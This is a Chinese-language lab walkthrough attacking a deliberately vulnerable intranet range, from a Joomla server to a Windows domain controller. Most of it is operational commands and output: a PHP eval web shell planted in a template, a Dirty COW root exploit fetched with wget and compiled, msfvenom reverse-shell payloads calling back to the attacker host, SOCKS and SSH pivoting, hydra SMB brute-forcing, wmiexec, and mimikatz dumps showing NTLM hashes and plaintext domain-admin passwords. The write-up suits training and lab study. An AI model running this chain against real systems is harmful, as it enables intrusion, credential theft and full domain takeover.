紅日安全內網靶場(三)滲透記錄
前面環境搭建先省掉
目前收集到的信息
- 一台公網IP的web服務器(我這里是16.16.16.0的網段,16.16.16.160)
- 開放22、80、3306端口
- Joomla 3.9.12
- mysql5.7.27
- 敏感目錄及文件
- 1.php——phpinfo頁面(注意:disabled_function禁用了很多函數,后續webshell執行命令有影響)
- /administrator/——后台登錄
- configuration.php~——配置文件的備份文件
- 數據庫的連接賬號及密碼(testuser/cvcvgjASD!@)
- 數據庫表前綴(am2zu_)
拿后台
因為3306開放,我們嘗試在攻擊機上直接連接數據庫
cmd :mysql -u testuser -h 16.16.16.160 -p
// 回車后輸入密碼就進入了數據庫
MySQL [joomla]>
MySQL [joomla]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
+--------------------+
2 rows in set (0.011 sec)
MySQL [joomla]> use joomla;
Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| am2zu_action_log_config |
| am2zu_action_logs |
| am2zu_action_logs_extensions |
| am2zu_action_logs_users |
| am2zu_assets |
| am2zu_associations |
| am2zu_banner_clients |
| am2zu_banner_tracks |
| am2zu_banners |
| am2zu_categories |
| am2zu_contact_details |
| am2zu_content |
| am2zu_content_frontpage |
| am2zu_content_rating |
| am2zu_content_types |
| am2zu_contentitem_tag_map |
| am2zu_core_log_searches |
| am2zu_extensions |
| am2zu_fields |
| am2zu_fields_categories |
| am2zu_fields_groups |
| am2zu_fields_values |
| am2zu_finder_filters |
| am2zu_finder_links |
| am2zu_finder_links_terms0 |
| am2zu_finder_links_terms1 |
| am2zu_finder_links_terms2 |
| am2zu_finder_links_terms3 |
| am2zu_finder_links_terms4 |
| am2zu_finder_links_terms5 |
| am2zu_finder_links_terms6 |
| am2zu_finder_links_terms7 |
| am2zu_finder_links_terms8 |
| am2zu_finder_links_terms9 |
| am2zu_finder_links_termsa |
| am2zu_finder_links_termsb |
| am2zu_finder_links_termsc |
| am2zu_finder_links_termsd |
| am2zu_finder_links_termse |
| am2zu_finder_links_termsf |
| am2zu_finder_taxonomy |
| am2zu_finder_taxonomy_map |
| am2zu_finder_terms |
| am2zu_finder_terms_common |
| am2zu_finder_tokens |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types |
| am2zu_languages |
| am2zu_menu |
| am2zu_menu_types |
| am2zu_messages |
| am2zu_messages_cfg |
| am2zu_modules |
| am2zu_modules_menu |
| am2zu_newsfeeds |
| am2zu_overrider |
| am2zu_postinstall_messages |
| am2zu_privacy_consents |
| am2zu_privacy_requests |
| am2zu_redirect_links |
| am2zu_schemas |
| am2zu_session |
| am2zu_tags |
| am2zu_template_styles |
| am2zu_ucm_base |
| am2zu_ucm_content |
| am2zu_ucm_history |
| am2zu_update_sites |
| am2zu_update_sites_extensions |
| am2zu_updates |
| am2zu_user_keys |
| am2zu_user_notes |
| am2zu_user_profiles |
| am2zu_user_usergroup_map |
| am2zu_usergroups |
| am2zu_users |
| am2zu_utf8_conversion |
| am2zu_viewlevels |
| umnbt_action_log_config |
| umnbt_action_logs |
| umnbt_action_logs_extensions |
| umnbt_action_logs_users |
| umnbt_assets |
| umnbt_associations |
| umnbt_banner_clients |
| umnbt_banner_tracks |
| umnbt_banners |
| umnbt_categories |
| umnbt_contact_details |
| umnbt_content |
| umnbt_content_frontpage |
| umnbt_content_rating |
| umnbt_content_types |
| umnbt_contentitem_tag_map |
| umnbt_core_log_searches |
| umnbt_extensions |
| umnbt_fields |
| umnbt_fields_categories |
| umnbt_fields_groups |
| umnbt_fields_values |
| umnbt_finder_filters |
| umnbt_finder_links |
| umnbt_finder_links_terms0 |
| umnbt_finder_links_terms1 |
| umnbt_finder_links_terms2 |
| umnbt_finder_links_terms3 |
| umnbt_finder_links_terms4 |
| umnbt_finder_links_terms5 |
| umnbt_finder_links_terms6 |
| umnbt_finder_links_terms7 |
| umnbt_finder_links_terms8 |
| umnbt_finder_links_terms9 |
| umnbt_finder_links_termsa |
| umnbt_finder_links_termsb |
| umnbt_finder_links_termsc |
| umnbt_finder_links_termsd |
| umnbt_finder_links_termse |
| umnbt_finder_links_termsf |
| umnbt_finder_taxonomy |
| umnbt_finder_taxonomy_map |
| umnbt_finder_terms |
| umnbt_finder_terms_common |
| umnbt_finder_tokens |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types |
| umnbt_languages |
| umnbt_menu |
| umnbt_menu_types |
| umnbt_messages |
| umnbt_messages_cfg |
| umnbt_modules |
| umnbt_modules_menu |
| umnbt_newsfeeds |
| umnbt_overrider |
| umnbt_postinstall_messages |
| umnbt_privacy_consents |
| umnbt_privacy_requests |
| umnbt_redirect_links |
| umnbt_schemas |
| umnbt_session |
| umnbt_tags |
| umnbt_template_styles |
| umnbt_ucm_base |
| umnbt_ucm_content |
| umnbt_ucm_history |
| umnbt_update_sites |
| umnbt_update_sites_extensions |
| umnbt_updates |
| umnbt_user_keys |
| umnbt_user_notes |
| umnbt_user_profiles |
| umnbt_user_usergroup_map |
| umnbt_usergroups |
| umnbt_users |
| umnbt_utf8_conversion |
| umnbt_viewlevels |
+-------------------------------+
156 rows in set (0.011 sec)
//結合之前在配置文件中數據庫表前綴的信息,我們嘗試查看下“am2zu_users”這個表,猜測就是用來存儲后台賬號的表
MySQL [joomla]> select * from am2zu_users;
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset |
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| 891 | Super User | administrator | test@test.com | $2y$10$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2 | 0 | 1 | 2019-10-19 12:48:41 | 0000-00-00 00:00:00 | 0 | | 0000-00-00 00:00:00 | 0 | | | 0 |
+-----+----------------+---------------+---------------+-------------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
2 rows in set (0.011 sec)
通過上網查閱Joomla密碼加密相關資料,發現“$2y\(10\)t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2”密碼是經過了password_hash($password, PASSWORD_BCRYPT);加密,並且未找到對應的解密方案。
並且通過burp抓包也嘗試了爆破,也無果。在這個地方卡了許久。
后來查閱Joomla官方文檔,上面有介紹到可以通過數據庫直接插入來添加管理員賬號,這不巧了。正好咱們有數據庫的權限。
//https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn
//其中下面sql語句中的jos31需要換成你實際的表前綴
INSERT INTO `jos31_users`
(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `jos31_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');
//執行完這兩條語句之后,我們就添加成功了一個管理員用戶(賬號:admin2,密碼:secret)
通過連接:http://16.16.16.160/administrator/登錄成功。
拿webshell
網上查閱joomla后台getshell,得知在后台的Extensions->Templates處可以通過修改模版php文件內容來getshell
具體操作為進入模版的編輯頁面,修改index.php或者添加一個新的php文件,內容寫上一句話<?php @eval($_POST['hack'])?>
拿蟻劍直接連上。
使用虛擬終端,發現命令無法執行,看來函數被禁用了。
實際測試,使用蟻劍的插件“PHP7 GC with Certain Destructors UAF”可以直接繞過限制。
但是是低賬號權限
uid=33(www-data) gid=33(www-data) groups=33(www-data)
提權
嘗試查看Linux版本信息
(www-data:/var/www/html/templates) $ lsb_release -a
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial
(www-data:/var/www/html/templates) $ uname -a
Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
對內核4.4.0的Linux本地提權嘗試了幾個exp后都沒有成功,僵持了很長時間,決定回頭理下思路。
。。。
峰回路轉,蟻劍翻目錄,發現了/tmp/mysql目錄下有個test.txt文件,打開一看是個賬號密碼的備份文件
adduser wwwuser
passwd wwwuser_123Aqx
直接ssh連
ssh wwwuser@16.16.16.160
連上發現是普通用戶權限,現在再uname -a 一下
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
內核2.6.32,搜一下對應的exp
searchsploit linux 2.6 cow
------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID M | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Meth | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method) | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd M | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
------------------------------------------------------------------------------------------------------------- ---------------------------------
多番嘗試,使用linux/local/40839.c成功提權,具體步驟如下
1.先下載對應文件
searchsploit -m linux/local/40839.c
2.攻擊機上用python開web
python3 -m http.server
3.在Linux機器上下載
wget http://16.16.16.160/40839.c
4.編譯
gcc -pthread -o 40839 40839.c -lcrypt
5.執行
./40839
6.成功后會讓你輸入一個密碼
7.成功創建一個root權限用戶(firefart/yourpassword)
8.su firefart 輸入密碼即可
#ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:32:46:C9
inet addr:16.16.16.167 Bcast:16.16.16.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe32:46c9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5074 errors:0 dropped:0 overruns:0 frame:0
TX packets:2521 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:684640 (668.5 KiB) TX bytes:692275 (676.0 KiB)
eth1 Link encap:Ethernet HWaddr 00:0C:29:32:46:D3
inet addr:192.168.93.100 Bcast:192.168.93.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe32:46d3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:43309 errors:0 dropped:0 overruns:0 frame:0
TX packets:519 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4423428 (4.2 MiB) TX bytes:66073 (64.5 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:1#
轉戰msf
msfvenom -p python/meterpreter/reverse_tcp LHOST=16.16.16.160 LPORT=4444 -f raw -o payload.py
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 16.16.16.160
set LPORT 4444
run
# 獲取到會話后
bg
# 設置路由
use post/multi/manage/autoroute
set session 1
run
# 開啟socks5代理
use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
開啟socks代理后,在攻擊機上用proxychainas測試下
# 配置好proxychains的socks5代理
# socks5 127.0.0.1 1080
proxychains curl http://192.168.93.100 # 該IP是內網IP地址,如果可以連接說明掛上了socks代理
# 在目前機器上執行ping,來查找內網存活主機
for k in $( seq 1 255);do ping -c 1 192.168.93.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
192.168.93.1
192.168.93.10root
192.168.93.20
192.168.93.30
192.168.93.100(centos,反向代理ubuntu的web服務和數據庫服務)
192.168.93.120(ubuntu,提供web服務)
從掃描出來的IP可以看出,一共有5台機器。
# nmap掃描對應的主機
proxychains nmap -sT -sV -Pn 192.168.93.10,20,30,100,120
192.168.93.120
------------------
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18
3306/tcp open mysql MySQL 5.7.27-0ubuntu0.16.04.1
192.168.93.10
------------------
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-03 06:55:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: test.org, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: TEST)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: test.org, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49155/tcp open unknown
49156/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Service Info: Host: WIN-8GA56TNV3MV; OS: Windows; CPE: cpe:/o:microsoft:windows
192.168.93.20
----------------
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: TEST)
1433/tcp open ms-sql-s Microsoft SQL Server 2008 10.00.1600; RTM
2383/tcp open ms-olap4?
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.92%I=7%D=3/3%Time=622068D9%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,5,"\x83\0\0\x01\x8f")%r(GenericLines,5,"\x83\0\0\x01\x8f")%r(HTT
SF:POptions,5,"\x83\0\0\x01\x8f")%r(RTSPRequest,5,"\x83\0\0\x01\x8f")%r(Fo
SF:urOhFourRequest,5,"\x83\0\0\x01\x8f")%r(LPDString,5,"\x83\0\0\x01\x8f")
SF:%r(LDAPSearchReq,5,"\x83\0\0\x01\x8f")%r(SIPOptions,5,"\x83\0\0\x01\x8f
SF:")%r(JavaRMI,5,"\x83\0\0\x01\x8f")%r(ms-sql-s,5,"\x83\0\0\x01\x8f");
Service Info: Host: WIN2008; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
192.168.93.30
-------------------
PORT STATE SERVICE VERSION
135/tcp open msrpc?
139/tcp open netbios-ssn?
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: TEST)
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.92%I=7%D=3/3%Time=62206BC8%P=x86_64-pc-linux-gnu%r(RPCC
SF:heck,5,"\x83\0\0\x01\x8f")%r(Help,5,"\x83\0\0\x01\x8f")%r(SSLSessionReq
SF:,5,"\x83\0\0\x01\x8f")%r(X11Probe,5,"\x83\0\0\x01\x8f");
Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
根據nmap對192.168.93.10,20,30的掃描結果,我們歸納一下信息
10——大概率是域控,開了dns和ladp服務,域:test.org
20——Windows 2008 R2 域成員,mssql服務
30——Windows 7 域成員
先跑一下ms17-010,三個機器都不存在該漏洞,這下好了,還以為直接一把梭就完事兒。我們回過頭再看下收集到的信息,發現IP20的機器開放了mssql服務,但是也沒有賬號阿。這時想到之前mysql的賬號,想想撞一下,結果還真登錄成了,但是是個guest低權限數據庫賬號,不會提權阿。
后來看了網上大佬們針對smb爆破成功,密碼123qwe!ASD,我傻了。是我的字典太拉了嘛。還能說什么,趕緊把密碼加入字典。=-=
proxychains -q hydra -l administrator -P top10000.txt smb://192.168.93.20/ # 123qwe!ASD
proxychains -q hydra -l administrator -P top10000.txt smb://192.168.93.30/ # 123qwe!ASD
現在的思路是msf生成一個Windows馬,上傳到192.168.93.20上執行反彈meterpreter,但是有個問題:192.168.93.20機器不出網。解決方案:通過centos(192.168.93.100)這台機器作為跳板機,做個端口轉發,將kali攻擊機的55555端口轉發到跳板機的55555端口。這里我們使用ssh隧道來做,先ssh登錄連上centos,然后執行以下命令:
// -C 壓縮傳輸;-f 將ssh傳輸轉入后台執行,不占用當前的shell;-N 建立靜默連接; -g 允許遠程主機連接本地用於轉發的端口 -L 本地端口轉發 16.16.16.182 kali攻擊機IP
ssh -CfNg -L 55555:16.16.16.182:55555 root@16.16.16.182
端口轉發做好了,我們用msf生成Windows馬
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.93.100 LPORT=55555 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o /root/55555.exe
//設置反彈到跳板機上,payload監聽kali機即可
msf設置監聽
msf
LHOST 16.16.16.182
LPORT 55555
我們可以使用kali上的smbclient進行連接,並上傳生成的55555.exe
proxychains -q smbclient //192.168.93.20/c$ -U administrator
smb: \>put 55555.exe
通過impack工具套件中的wmiexec.py可以獲取一個cmd會話:
proxychains -q python3 wmiexec.py administrator:123qwe\!ASD@192.168.93.20
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
# 執行55555.exe
C:\>55555.exe(可能需要執行多遍才能成功)
以上做完,msf就獲取到192.168.93.20的meterpreter會話了
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# migrate到一個SYSTEM的進程中
migrate xxxpid
# 加載kiwi
meterpreter > load kiwi
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Administrator TEST fc5d63d71569f04399b41 18edd0cc3227be3bf61ce 0f058e319f079c15fe3449
9bc76e2eb34 198835a1d97 bbeffc086cfa4d231e
Administrator WIN2008 ae946ec6f4ca785b93371 31c1794c5aa8547c87a8b 128c0272959b85b3300906
dee1d5ee7e6 cd0324b8337 11169d07d85cb6bd0b
WIN2008$ TEST c47b1f47431b259861e61 5a09ade7dca624916c3947
5472864c698 3fd609c22302dd33bc
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TEST zxcASDqw123!!
Administrator WIN2008 123qwe!ASD
...
這就直接拉出域控賬號密碼了TEST\Administrator:zxcASDqw123!!
如果只是為了拿flag,直接smbclient登上去就行了
root@kali ~ proxychains -q smbclient -U administrator //192.168.93.10/c$
Enter WORKGROUP\administrator's password:
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\192.168.93.10\c$\
smb: \> cd Users/Administrator/Documents/
smb: \Users\Administrator\Documents\> ls
. DR 0 Thu Oct 31 00:52:43 2019
.. DR 0 Thu Oct 31 00:52:43 2019
desktop.ini AHS 402 Wed Oct 30 22:12:57 2019
flag.txt A 13 Thu Oct 31 00:53:16 2019
My Music DHSrn 0 Sun Oct 6 19:14:33 2019
My Pictures DHSrn 0 Sun Oct 6 19:14:33 2019
My Videos DHSrn 0 Sun Oct 6 19:14:33 2019
15728127 blocks of size 4096. 12293852 blocks available
smb: \Users\Administrator\Documents\>get flag.txt
smb: \Users\Administrator\Documents\>exit
root@kali ~ cat flag.txt
this is flag!#
如果想要在msf拿到meterpreter,可以和前面拿win2008機器一樣的操作,將msf生成的55555.exe傳上去執行,msf就會獲得到meterpreter會話。
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 16.16.16.182:55555
[*] Sending stage (175174 bytes) to 16.16.16.182
[*] Meterpreter session 5 opened (16.16.16.182:55555 -> 16.16.16.182:45240 ) at 2022-03-09 19:18:08 +0800
meterpreter > sysinfo
Computer : WIN-8GA56TNV3MV
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : TEST
Logged On Users : 4
Meterpreter : x86/windows
meterpreter > getuid
Server username: TEST\Administrator